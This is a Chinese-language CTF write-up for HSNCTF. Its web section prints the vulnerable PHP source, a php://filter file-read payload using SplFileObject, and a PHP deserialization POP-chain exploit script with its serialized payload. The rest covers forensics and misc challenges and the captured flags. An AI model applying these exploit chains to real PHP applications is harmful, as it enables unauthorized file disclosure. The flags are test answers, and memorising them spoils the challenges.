目录
web
Primitive php
题目源码:
<?php
highlight_file(__FILE__);
//hint.php
foreach ($_GET as $value) {
if(preg_match("/flag/",$value)){
die("不可以看flag啦,阿sir");
}
}
$a = new $_GET['class1']($_GET['a']);$b = new $_GET['class2']($_GET['b']);
if ($a !== $b and md5($a)===md5($b))
{
echo new $_GET['class3']($_GET['c']);
}
尝试rce读取flag无果,构造伪协议读取hint.php
filter流伪协议读到源码
payload:
?class2=Exception&b=<script>alert('1')</script>&class1=Exception&a=<script>alert('1')</script>&class3=SplFileObject&c=php://filter/convert.base64-encode/resource=hint.php
解base64得到hint.php
<?php
echo "no hint";
class blue
{
public $b1;
public $b2;
function eval() {
echo new $this->b1($this->b2);
}
public function __invoke()
{
$this->b1->blue();
}
}
class red
{
public $r1;
public function __destruct()
{
echo $this->r1 . '0xff0000';
}
public function execute()
{
($this->r1)();
}
public function __call($a, $b)
{
echo $this->r1->getFlag();
}
}
class white
{
public $w;
public function __toString()
{
$this->w->execute();
return 'hello';
}
}
class color
{
public $c1;
public function execute()
{
($this->c1)();
}
public function getFlag()
{
echo file_get_contents($this->c1);
}
}
unserialize($_POST['cmd']);
反序列化构造payload
参考:
[DASCTF 2022]三月赛 web 复现_das三月赛web_Snakin_ya的博客-CSDN博客
构造伪协议读取flag
php://filter/convert.base64-encode/resource=flag.php
exp:
<?php
class blue
{
public $b1;
public $b2;
public function __construct($b1)
{
$this->b1 = $b1;
}
}
class red
{
public $r1;
public function __construct($r1)
{
$this->r1 = $r1;
}
}
class white
{
public $w;
public function __construct($w)
{
$this->w = $w;
}
}
class color
{
public $c1;
public function __construct($c1)
{
$this->c1 = $c1;
}
}
$f = new color("php://filter/convert.base64-encode/resource=flag.php");
$e = new red($f);
$d = new blue($e);
$c = new color($d);
$b = new white($c);
$a = new red($b);
echo (urlencode(serialize($a)));
unserialize($_POST['cmd']); //
post传参cmd
payload:
cmd=O%3A3%3A%22red%22%3A1%3A%7Bs%3A2%3A%22r1%22%3BO%3A5%3A%22white%22%3A1%3A%7Bs%3A1%3A%22w%22%3BO%3A5%3A%22color%22%3A1%3A%7Bs%3A2%3A%22c1%22%3BO%3A4%3A%22blue%22%3A2%3A%7Bs%3A2%3A%22b1%22%3BO%3A3%3A%22red%22%3A1%3A%7Bs%3A2%3A%22r1%22%3BO%3A5%3A%22color%22%3A1%3A%7Bs%3A2%3A%22c1%22%3Bs%3A52%3A%22php%3A%2F%2Ffilter%2Fconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D%7Ds%3A2%3A%22b2%22%3BN%3B%7D%7D%7D%7D
HSNCTF{537C532E-408B-FDCD-3E49-58E6FB578579}
misc
extract
用工具cloakify
kali:
打开保存的文件
改后缀zip
zip套娃,文件名递减1
脚本实现
import zipfile
count = 2331
while count>0:
path = 'f'+ str(count) + '.zip'
folder_abs = '.'
zip_file = zipfile.ZipFile(path)
zip_list = zip_file.namelist()
for f in zip_list:
zip_file.extract(f, folder_abs)
zip_file.close()
count -= 1
得到
hsnctf{66eec912-e9ce-4e1d-ac54-ecea075dcb96}
签到题
hsnctf{welcome_to_hsnctf}
外星电波~
解zip文件数据base64encode
得到一个加密的压缩包
NTFS数据流加密
得到音频,导出,sstv读
解压缩包得到flag
hsnctf{70995fb0-eb60-0787-f305-77066aeb6730}
Crypto
daobudao
hsnctf{g00d_luck_have_fun}
工控流量分析
S7_analysis
随便翻翻,看见一个stop
hsnctf{399}
舔狗日记
宝,刚刚洗完澡,洗澡的时候热水器好像是坏了,水一冷一热的,我突然就想到了你,因为你对我也是忽冷忽热的